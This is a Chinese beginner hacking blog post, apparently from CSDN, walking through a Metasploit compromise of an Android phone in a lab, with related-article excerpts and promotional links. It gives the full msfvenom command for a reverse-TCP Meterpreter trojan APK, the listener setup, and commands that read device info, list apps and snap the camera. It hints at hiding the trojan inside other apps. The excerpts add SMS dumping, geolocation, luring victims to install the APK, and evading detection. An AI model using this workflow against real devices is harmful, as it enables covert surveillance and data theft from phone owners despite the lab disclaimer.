网络安全新手入门—MSF渗透安卓手机(小白的第一次黑客渗透)

最新推荐文章于 2025-09-30 14:04:27 发布
原创 最新推荐文章于 2025-09-30 14:04:27 发布 · 1.1k 阅读 · 22 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #android #智能手机

    • 网络安全新手入门—MSF渗透安卓手机(小白的第一次黑客渗透)

      一、前言

      MSF,全称为Metasploit Framework,是kali中一款全球知名的开源渗透测试工具。此文章中的方法只能进行内网渗透。由于kali在虚拟机中,其显示的内网IP无法被外网的安卓手机S直接访问,所以不能直接将文章方法应用于外网。该实验为模拟环境,未经授权的渗透都是违法行为,我们都是守法的好公民。而且这种方法只能渗透安卓10以下的系统,入侵渗透更高级的系统需要更加专业的知识,再加上只能进行内网渗透,所以这种方法很难进行违法渗透!

      img

      二、演示环境

      攻击主机虚拟机 kali IP:192.168.147.129
      靶机联想模拟器 安卓9

      三、渗透过程

      (一)查询虚拟机中kali的IP

      我先在终端中输入ifconfig查询了自己虚拟机中kali的ip地址,如下图,可知ip为192.168.147.129
      在这里插入图片描述

      (二)使用root权限

      我先在终端输入su root,输入自己的密码,使用root权限,然后在此权限下进行以下操作。

      (三)生成木马

      这个木马是放在靶机上的,目的是与攻击主机进行连接,使攻击主机控制靶机,为了隐蔽,我们可以把木马软件或网站链接捆绑在一起,神不知鬼不觉地使木马靶机上运行起来,这也就是为什么尽量不要在第三方网站下载破解软件,不要随便点击不明网站的原因。这里我为了追求方便,就直接裸木马

      输入msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.147.129 LPORT=6666 R >木马.apk(这里的 LHOST换成自己kali的ip,LPORT换成一个没被占用的端口,后面的木马安装包apk的名称自定义)生成的安装包apk会默认生成在桌面的主文件夹中,并把此木马放在靶机上(在靶机上安装后软件名默认为MainActivity),先不要运行,如下图:

      在这里插入图片描述

      在这里插入图片描述

      (四)打开MSF

      我继续在终端输入msfconsole打开SF`(这里打开之后显示的图案是随机的)
      在这里插入图片描述

      (五)配置攻击载荷

      我接着在终端中输入以下命令进行配置(一条一条输入)

      use exploit/multi/handler  //选择模块
set payload android/meterpreter/reverse_tcp   //选择攻击模块
set LHOST 192.168.147.129    //与你自己kali的IP保持一致
set LPORT 6666   //与你之前设置的端口保持一致

      图片

      (六)运行

      配置完之后我输入run运行,然后双击靶机上的木马,使它在靶机上运行,出现类似如下图,则代表渗透成功:
      在这里插入图片描述

      (七)控制靶机的指令
      1、查看对方手机系统信息

      命令:sysinfo
      在这里插入图片描述

      2、查看对方手机安装哪些app文件

      命令:app_list
      在这里插入图片描述

      3、控制摄像头拍摄一张照片

      注意:要先给虚拟机摄像头权限,安装上相机,有前置摄像头开关的电脑要打开它
      命令:webcam_snap(也是成功拍到了我的键盘)
      在这里插入图片描述

黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

1.学习路线图

在这里插入图片描述

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我们和网安大厂360共同研发的的网安视频教程,之前都是内部资源,专业方面绝对可以秒杀国内99%的机构和个人教学!全网独一份,你不可能在网上找到这么专业的教程。

内容涵盖了入门必备的操作系统、计算机网络和编程语言等初级知识,而且包含了中级的各种渗透技术,并且还有后期的CTF对抗、区块链安全等高阶技术。总共200多节视频,200多G的资源,不用担心学不全。
在这里插入图片描述
因篇幅有限,仅展示部分资料,需要见下图即可前往获取

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
————————————————

本文转自 https://blog.youkuaiyun.com/bdfcfff77fa/article/details/149087193?spm=1001.2014.3001.5502,如有侵权,请联系删除。

MSF渗透安卓手机(George的第一次黑客渗透
2402_86265887的博客
01-27 2757
刚进行过黑客渗透的 George 激情澎湃,决定写一篇 优快云 记录一下,谨以纪念!MSF,全称为,是kali中一款全球知名的开源渗透测试工具。此文章中的方法只能进行内网渗透。由于kali在虚拟机中,其显示的内网IP无法被外网的安卓手机S直接访问,所以不能直接将文章方法应用于外网。该实验为模拟环境,未经授权的渗透都是违法行为,我们都是守法的好公民。
msf渗透手机(操作手机系统)
xss2001999的博客
11-09 758
msf渗透智能手机安卓系统)
MSF渗透测试android手机
永远是少年
06-15 5599
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF渗透测试android手机。 一、Android木马生成 二、Android木马安装 三、效果检验
2025黑客常用的最新20款黑客工具(附下载安装教程),看这篇文章就够了
2401_84215240的博客
09-30 1519
今天,统计了全球各大网站数据(浏览量、下载量、使用量等等),最受欢迎的 20 款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等。取前 20 款列出,排名不分先后!
MSF渗透Android
Yxisobai的博客
05-28 1773
kali linux 云服务器,云服务器安装kali linux网络软件不要乱下载,自己做测试的时候没做免杀手机能监测出病毒,但是被有心之人利用,通过捆绑,免杀等一系列操作,还是很难发现的。特别注意一下外挂等软件,xx助手等软件。
msf渗透安卓
weixin_30872499的博客
05-29 679
/*metasploit之远控*/msfconsole //开启metasploit模块/*根据自己的IP生成一个木马*/msfvenom -p 系统/meterpreter/reverse_tcp LHOST=IP LPORT = 端口 R> 文件名.exe(安卓.apk) use expolit/multi/handler //开启模块 show options //查看参数设置...
网络安全渗透测试】基于Metasploit框架的MSF工具使用指南:漏洞利用与反向Shell攻击技术实践
最新发布
11-30
适合人群:网络安全初学者、渗透测试人员、安全运维人员,具备基本操作系统和网络知识的技术人员; 使用场景及目标:①学习MSF框架在真实环境中进行漏洞利用与渗透测试的操作流程;②掌握shellcode生成、监听上线、...
Kali利用MSF渗透安卓手机_kali入侵安卓手机(1)
2401_84519960的博客
05-01 2191
由于文章篇幅原因,我只把面试题列了出来,详细的答案,我整理成了一份PDF文档,这份文档还包括了还有高级架构技术进阶脑图、Android开发面试专题资料,高级进阶架构资料 ,帮助大家学习提升进阶,也节省大家在网上搜索资料的时间来学习。网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化学习资料的朋友,可以戳这里获取一个人可以走的很快,但一群人才能走的更远!
网络安全基于Metasploit Framework的后渗透测试技术:利用MSF进行木马生成与持久化控制
05-09
内容概要:本文详细介绍了Metasploit Framework(MSF)这款由Rapid7公司维护的开源渗透测试框架,旨在提升用户的安全意识,防范因点击不安全应用而导致的信息泄露。文中讲解了MSF中exploit、payload、auxiliary、post...
Kali利用MSF渗透安卓手机_kali入侵安卓手机
2401_87034253的博客
09-11 2035
MSF是一个综合性渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具。
如何开展手机的渗透测试?
weixin_34381687的博客
11-28 520
欢迎访问网易云社区,了解更多网易技术产品运营经验。 手机的渗透测试可以分为3点: 同Web安全渗透测试类似,需要对Server API和终端应用进行安全测试; OS本身的特性或安全问题; 应用被逆向破解,业务逻辑和信息被盗取; 第一块的问题也不少,很多做移动开发的工程师并不一定有Web安全的经验。 很多App都存在各种逻辑漏洞,比如A...
MSF手机渗透实验
weixin_63204687的博客
10-22 5012
可真刑,太可拷了
渗透测试】利用MSF入侵安卓手机
yy1715713348的博客
07-03 1258
准备一个废弃的安卓手机,建议买小米系列,通过MSF生成APK文件植入安卓手机,而渗透入手机,查看相关信息**”**01工具msfvenom、msfconsole(Kali系统内置)02 渗透sudo -i*****命令:*实例:*****运行上述命令后生成****上述总共6个步骤,在运行第6个步骤之前,请在手机端安装这个APK文件最后出现meterpreter,表示成功。4.meterpreter常用指令对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。
使用kali的msf渗透安卓手机
r7rrtyrytr的博客
01-30 3871
#1# 生成安卓手机木马 msfvenom -p android/meterpreter/reverse_tcp LHOST=(本机ip) LPORT=4444 R > /home/kali/Desktop/111.apk apk生成后会保存在桌面上。 #2# 加载模块 use exploit/multi/handler #3# 选择Payload set payload android/meterpreter/reverse_tcp #4# 查看参数并设置 show o
MSF模拟渗透测试之攻击Android
lza20001103的博客
04-09 7451
MSF渗透测试系列之攻击Android
MSF入侵安卓手机
2201_75719295的博客
05-18 5919
里边安装了许许多多的工具。其中MSF就自带有。MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。现在要做的就是把木马文件搞到人家的手机上,思路有很多 可以DNS arp劫持欺骗 只要对方用手机下载文件 就会下载我们的木马文件。这样我们就在/root/路径下生成了一个APK的安卓木马文件,至于木马的免杀暂且不谈。还有社工什么等等的,这里我就简单的把木马文件弄我自己的手机上做测试。
智能手机渗透测试框架
qq_59550643的博客
03-14 624
下载并安装智能手机渗透测试框架 (Smartphone Pentest Framework, SPF)。这是 一个测试移动设备安全性的框架平台。首先要使用 git 命令下载它的源代码,然后再进入到下载目录的 Smartphone-Pentest-Framework 子目录中。 —————————————————————————————————————————————— root@kali:"# git clone https: //github.com/georgiaw/Smartphone-...
利用metasploit对手机进行渗透实战
qq_52907838的博客
08-18 3674
第一步:用ifconfig命令查看本机ip地址 第二步:用msfvenom -p命令生成apk木马文件 具体命令为 msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.101.7 lport=8848 R > /home/kali/桌面/muma.apk 说明:lhost后面的IP地址为刚刚查到的本机IP(这里也可以不用本机IP),lport后面为自己规定的端口号,我规定的为8848,R为指定文件格式,后面接生成apk的
MSF和永恒之蓝&渗透安卓手机
niqiu320的博客
04-23 2486
Metasploit简介 Metasploit框架是一个开源的渗透工具,它是由Ruby语言编写的模块化框架,具有良好的扩展性,通过它可以轻易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。 它提供了多个基本的用户接口,包括终端、命令行、图形化等,一般我们使用较多的是终端MSF和图形化的Armitage 它分为社区版和商业版 qpt-get update apt-get install metasploit-framework MSF框架是由多个模块组成的,具体的模块
Msf渗透安卓手机
08-06
要使用 Metasploit 框架对安卓手机进行渗透测试,通常涉及以下几个关键步骤: ### 生成 Android APK payload 首先,需要使用 `msfvenom` 工具生成一个 Android 反向 TCP Meterpreter payload,这个 payload 会被嵌入到一个 APK 文件中,以便在目标设备上执行。 ```bash msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -o payload.apk ``` - `-p`:指定 payload 类型为 `android/meterpreter/reverse_tcp`。 - `LHOST`:设置攻击者的本地 IP 地址。 - `LPORT`:设置监听的本地端口号。 - `-o payload.apk`:输出文件名为 `payload.apk` [^3]。 ### 配置 Metasploit 监听器 生成 payload 后,需要在 Metasploit 中配置监听器,以便在目标设备运行 payload 后建立连接。 ```bash msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 192.168.1.1 set LPORT 4444 exploit ``` - `use exploit/multi/handler`:选择多平台监听器模块。 - `set payload`:设置与生成的 payload 相同的类型。 - `set LHOST` 和 `LPORT`:配置与生成 payload 时相同的 IP 和端口。 - `exploit`:启动监听器 [^3]。 ### 诱使目标安装 APK 生成的 `payload.apk` 文件需要被安装到目标设备上。由于 Android 系统的安全机制,通常需要社会工程学手段来诱使用户安装该 APK 文件。例如,可以通过伪装成合法的应用程序(如游戏、工具等)来诱导用户下载和安装 [^3]。 ### 获取 Meterpreter Shell 一旦目标设备成功安装并运行了 `payload.apk`,Metasploit 将会接收到一个连接请求,并建立一个 Meterpreter 会话。此时,可以使用 Meterpreter 提供的各种命令来控制目标设备,例如: - `sysinfo`:查看目标设备的基本信息。 - `shell`:启动一个命令行 shell。 - `webcam_snap`:捕获目标设备的摄像头照片。 - `dump_sms`:导出目标设备的短信内容。 - `geolocate`:获取目标设备的地理位置信息 [^4]。 ### 注意事项 - **权限问题**:某些功能可能需要 root 权限才能正常运行。 - **安全检测**:现代 Android 设备通常会检测恶意软件,因此生成的 payload 可能需要进行混淆或加密以绕过检测。 - **法律合规**:在进行渗透测试时,必须确保拥有合法的授权,未经授权的攻击行为是非法的 [^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值